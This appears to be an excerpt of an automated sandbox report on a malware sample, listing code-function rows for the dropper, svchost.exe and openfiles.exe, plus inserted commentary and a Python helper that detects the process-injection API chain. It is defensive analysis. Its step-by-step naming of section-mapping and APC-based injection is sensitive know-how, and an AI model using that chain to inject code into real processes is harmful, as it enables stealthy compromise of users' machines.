            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F2F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F2F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F2FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F2AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F2B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F3010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F3090 NtSetValueKey
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F3D70 NtOpenThread
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F3D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_00159180 NtCreateFile
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_001592B0 NtReadFile
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_00159370 NtDeleteFile
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_001593F0 NtClose
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_00159520 NtAllocateVirtualMemory
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001E4021 CreateFileW,DeviceIoControl,CloseHandle
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001D8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001E545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
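Two things in the rows above are worth separating. The svchost.exe and openfiles.exe rows enumerate Nt* stubs directly, and the same set appears twice in svchost.exe (once in the 0x0040xxxx range inside the 0x400000 region the Yara hits come from, once at 0x0347xxxx) and again at 0x044Fxxxx in openfiles.exe with identical low-order offsets (03472B60 / 044F2B60 for NtClose, 03472D10 / 044F2D10 for NtMapViewOfSection, 03472EE0 / 044F2EE0 for NtQueueApcThread, and so on), which is what one module relocated into two processes looks like. The process 0 rows, by contrast (DuplicateTokenEx, LoadUserProfileW and CreateProcessAsUserW in one function; ExitWindowsEx, InitiateSystemShutdownExW and SetSystemPowerState in another), are the AutoIt3 runtime's RunAs and Shutdown built-ins, present in every compiled AutoIt binary, and the "runas" and Se*Privilege strings in the memory-string rows belong to the same code; on their own they say nothing about this sample. The Python below is an added example, not code from the report or from Joe Sandbox: it parses rows in this page's flattened form (or with a "|" separator), checks each process for the NtOpenProcess, NtCreateSection plus NtMapViewOfSection, NtWriteVirtualMemory, and NtQueueApcThread / NtSetContextThread / NtResumeThread chain behind the injection signatures, and fingerprints the Nt* stubs by offset inside a 1 MiB address window. The window size is a grouping heuristic of this example, not a module base the sandbox reports, and the row subset embedded in the block is copied from this section.

```python
"""Added detection helper (not part of the report or of Joe Sandbox).

Parses 'Code function' rows of this report, checks each process for the
section-mapping injection chain, and fingerprints Nt* stubs by offset inside a
1 MiB window so a module present in two processes shows up as one layout.
ASSUMPTIONS: rows are in the page's flattened form or use a '|' separator;
the 1 MiB window (addr >> 20) is a grouping heuristic, not a reported module base.
"""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

ROW_RE = re.compile(
    r"Source:\s*(?P<src>.+?)\s*\|?\s*Code function:\s*"
    r"(?P<proc>\d+)_(?P<ctx>\d+)_(?P<addr>[0-9A-Fa-f]+):?\s*(?P<rest>.*)$"
)
FID_RE = re.compile(r"^\d+_\d+_[0-9A-Fa-f]+$")  # the function id repeated at the end of a row

# Injection stages behind this report's signatures: 'all' = every call needed, 'any' = one suffices.
INJECTION_STAGES = [
    ("open target", ("NtOpenProcess", "NtCreateProcessEx"), any),
    ("map section", ("NtCreateSection", "NtMapViewOfSection"), all),
    ("write memory", ("NtWriteVirtualMemory",), any),
    ("run payload", ("NtQueueApcThread", "NtSetContextThread", "NtResumeThread"), any),
]


def parse_row(line: str) -> Optional[dict]:
    """Split one row into source image, process index, function address and API list."""
    m = ROW_RE.search(line.strip())
    if m is None:
        return None
    apis = [t.strip() for t in m["rest"].split(",")]
    apis = [t for t in apis if t and not FID_RE.match(t)]
    return {"src": m["src"], "proc": int(m["proc"]), "addr": int(m["addr"], 16), "apis": apis}


def injection_stages(apis) -> List[str]:
    return [name for name, calls, mode in INJECTION_STAGES if mode(c in apis for c in calls)]


def summarize(rows: List[str]) -> Dict[int, dict]:
    """Per process index: source image and the injection stages its rows cover."""
    apis_by_proc, src_by_proc = defaultdict(set), {}
    for line in rows:
        row = parse_row(line)
        if row is None:
            continue
        apis_by_proc[row["proc"]].update(row["apis"])
        src_by_proc[row["proc"]] = row["src"]
    return {p: {"src": src_by_proc[p], "stages": injection_stages(a)} for p, a in apis_by_proc.items()}


def module_fingerprints(rows: List[str]) -> Dict[Tuple[int, int], frozenset]:
    """(proc, addr >> 20) -> set of (Nt* name, offset from the lowest Nt* stub in that window)."""
    groups = defaultdict(list)
    for line in rows:
        row = parse_row(line)
        if row and row["apis"] and row["apis"][0].startswith("Nt"):
            groups[(row["proc"], row["addr"] >> 20)].append((row["apis"][0], row["addr"]))
    fps = {}
    for key, stubs in groups.items():
        lowest = min(addr for _, addr in stubs)
        fps[key] = frozenset((name, addr - lowest) for name, addr in stubs)
    return fps


def shared_modules(rows: List[str]) -> List[Tuple[Tuple[int, int], Tuple[int, int]]]:
    """Pairs of (proc, window) in different processes whose Nt* stub layout is identical."""
    fps = module_fingerprints(rows)
    keys = sorted(fps)
    return [(a, b) for i, a in enumerate(keys) for b in keys[i + 1:]
            if a[0] != b[0] and fps[a] == fps[b]]


# Subset of this report's rows, copied from the page in its flattened form (constructed input).
REPORT_ROWS = [l for l in r"""
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040B043 NtCreateSection,2_2_0040B043
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040AA13 NtSetContextThread,2_2_0040AA13
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472B60 NtClose,LdrInitializeThunk,2_2_03472B60
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472CF0 NtOpenProcess,2_2_03472CF0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F30 NtCreateSection,2_2_03472F30
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D10 NtMapViewOfSection,2_2_03472D10
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472E30 NtWriteVirtualMemory,2_2_03472E30
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472EE0 NtQueueApcThread,2_2_03472EE0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FB0 NtResumeThread,2_2_03472FB0
Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F2B60 NtClose,LdrInitializeThunk,5_2_044F2B60
Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F2CF0 NtOpenProcess,5_2_044F2CF0
Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F2F30 NtCreateSection,LdrInitializeThunk,5_2_044F2F30
Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_044F2D10
Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F2E30 NtWriteVirtualMemory,5_2_044F2E30
Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F2EE0 NtQueueApcThread,LdrInitializeThunk,5_2_044F2EE0
Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F2FB0 NtResumeThread,LdrInitializeThunk,5_2_044F2FB0
Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_00159180 NtCreateFile,5_2_00159180
Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_00159520 NtAllocateVirtualMemory,5_2_00159520
Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001E4021: CreateFileW,DeviceIoControl,CloseHandle,0_2_001E4021
""".splitlines() if l.strip()]

if __name__ == "__main__":
    for proc, info in sorted(summarize(REPORT_ROWS).items()):
        print(proc, info["src"], info["stages"])
    print(shared_modules(REPORT_ROWS))
```

On the embedded rows, processes 2 and 5 cover all four stages and process 0 covers none, and the 0x0347xxxx window of svchost.exe fingerprints identically to the 0x044Fxxxx window of openfiles.exe. When running this over the full row set, remember that static presence of the calls is what the sandbox reports here; the "Writes to foreign memory regions" and "Queues an APC in another process" signatures come from observed behaviour and are the stronger evidence.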
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_0018E800
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001ADBB5
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_0020804A
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_0018E060
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_00194140
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001A2405
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001B6522
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_00200665
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001B267E
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001A283A
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_00196843
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001B89DF
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_00198A0E
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001B6A94
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_00200AE2
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001E8B13
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001DEB07
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001ACD61
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001B7006
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_0019710E
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_00193190
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_00181287
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001A33C7
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001AF419
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_00195680
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001A16C4
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001A78D3
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001958C0
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001A1BB8
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001B9D05
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_0018FE40
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001A1FD0
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001ABFE6
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_014036B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041806E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00418073
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041187A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00411883
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401250
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00411AA3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403300
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040FB23
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040FC67
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402540
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042ED43
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004027E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034FA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035003E6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034C02C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034C8158
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03430100
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034F81CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034F41A2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035001AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03464750
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0343C7C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0345C6E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03500591
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034F2446
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034E4420
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034EE4F6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034FAB40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034F6BD7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0350A9A6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0344A840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03442840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0346E8F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034268B8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B4F40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03482F28
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03460F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034E2F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03432FC8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0344CFE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034BEFA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03440E59
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034FEE26
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034FEEDB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03452E90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034FCE93
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0344AD00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034DCD1F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0343ADE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03458DBF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03440C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03430CF2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034E0CB5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0342D34C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034F132D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0348739A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0345B2C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034452A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0347516C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0350B16B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0344B1B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034EF0CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034F70E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034FF0E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034FF7B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03485630
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034F16CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034F7571
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035095C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034DD5B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03431460
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034FF43F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034FFB76
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B5BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0347DBF9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0345FB80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034FFA49
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034F7A46
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B3A6C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034EDAC6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034DDAAC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03485AA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034E1AA3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03449950
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0345B950
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034D5910
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034AD800
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034438E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034FFF09
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03403FD2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03403FD5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03441F92
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034FFFB1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03449EB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03443D40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034F1D5A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034F7D73
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0345FDC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B9C32
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034FFCF2
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | Code function: 4_2_0344E344
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | Code function: 4_2_0344E200
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | Code function: 4_2_03450180
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | Code function: 4_2_0345674B
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | Code function: 4_2_0344FF57
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | Code function: 4_2_03456750
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | Code function: 4_2_0344FF60
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | Code function: 4_2_0346D420
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_04572446
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_04564420
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_0456E4F6
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044C0535
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_04580591
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044DC6E0
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044E4750
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044C0770
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044BC7C0
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_04552000
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_04548158
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044B0100
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_0455A118
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_045781CC
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_045801AA
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_045741A2
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_04560274
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_045402C0
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_0457A352
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044CE3F0
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_045803E6
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044C0C00
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044B0CF2
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_04560CB5
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_0455CD1F
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044CAD00
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044BADE0
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044D8DBF
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044C0E59
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_0457EE26
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_0457EEDB
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_0457CE93
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044D2E90
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_04534F40
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_04562F30
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_04502F28
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044E0F30
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044B2FC8
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044CCFE0
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_0453EFA0
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044CA840
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044C2840
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044EE8F05_2_044EE8F0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044A68B85_2_044A68B8
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044D69625_2_044D6962
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044C29A05_2_044C29A0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0458A9A65_2_0458A9A6
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044BEA805_2_044BEA80
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0457AB405_2_0457AB40
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_04576BD75_2_04576BD7
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044B14605_2_044B1460
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0457F43F5_2_0457F43F
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_045775715_2_04577571
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_045895C35_2_045895C3
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0455D5B05_2_0455D5B0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_045056305_2_04505630
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_045716CC5_2_045716CC
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0457F7B05_2_0457F7B0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044C70C05_2_044C70C0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0456F0CC5_2_0456F0CC
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0457F0E05_2_0457F0E0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_045770E95_2_045770E9
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F516C5_2_044F516C
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0458B16B5_2_0458B16B
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044AF1725_2_044AF172
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044CB1B05_2_044CB1B0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044DB2C05_2_044DB2C0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_045612ED5_2_045612ED
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044C52A05_2_044C52A0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044AD34C5_2_044AD34C
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0457132D5_2_0457132D
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0450739A5_2_0450739A
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_04539C325_2_04539C32
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0457FCF25_2_0457FCF2
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044C3D405_2_044C3D40
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_04571D5A5_2_04571D5A
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_04577D735_2_04577D73
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044DFDC05_2_044DFDC0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044C9EB05_2_044C9EB0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0457FF095_2_0457FF09
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_04483FD25_2_04483FD2
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_04483FD55_2_04483FD5
